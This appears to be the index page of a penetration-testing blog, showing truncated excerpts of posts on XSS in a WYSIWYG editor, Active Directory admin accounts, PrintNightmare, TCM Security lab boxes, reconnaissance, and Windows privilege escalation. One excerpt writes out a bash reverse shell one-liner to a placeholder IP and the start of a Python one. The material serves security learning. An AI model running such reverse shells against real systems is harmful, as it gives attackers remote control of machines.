Prelude Sometime during the last quarter of 2025, I led a web app pentest engagement for an internal application, and I stumbled across a reflected XXS vulnerability within a WYSIWYG editor used ...

image credit: Iperius Highly privileged accounts (Domain Admins, Administrators, Enterprise Admins, etc.) are the ultimate goal for every threat actor or hacker out there. These accounts are soug...

Confidentiality Statement This penetration testing report is intended for educational purposes only and should not be used for any malicious activities. The information contained within should n...

TLDR This documentation is a guide on how to successfully connect an android emulator proxy with burp suite for Android Penetration Testing. The reason for this is that the official documentati...

Introduction This Tryhackme box covers the vulnerability known as PrintNightmare (CVE-2021-1675) and (CVE-2021-34527). The attack is a post compromise attack. Which means that we must have com...

Summary This box was created by TCM Security for their Practical Ethical Hacking course and the experience is more practical rather than ctf oriented. Scanning & Enumeration Nmap sudo nmap ...

Summary This machine is a replica of the well known box called Blue on TryHackme and Hack The Box. It was created by TCM Security for their Practical Ethical Hacking course and the experience i...

Information Gathering / Reconnaissance It could be Active or Passive. An example of Passive reconnaissance is when we are given a client and then we go on google to search about that client. On...

Gaining Access Reverse Shell One-Liners Bash bash -i >& /dev/tcp/<IP-address>/8080 0>&1 Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INE...

Manual Checks A list of useful commands to perform manual privilege escalation on Windows operating system. Windows Version and Configuration Get system info systeminfo | findstr /B /C:"O...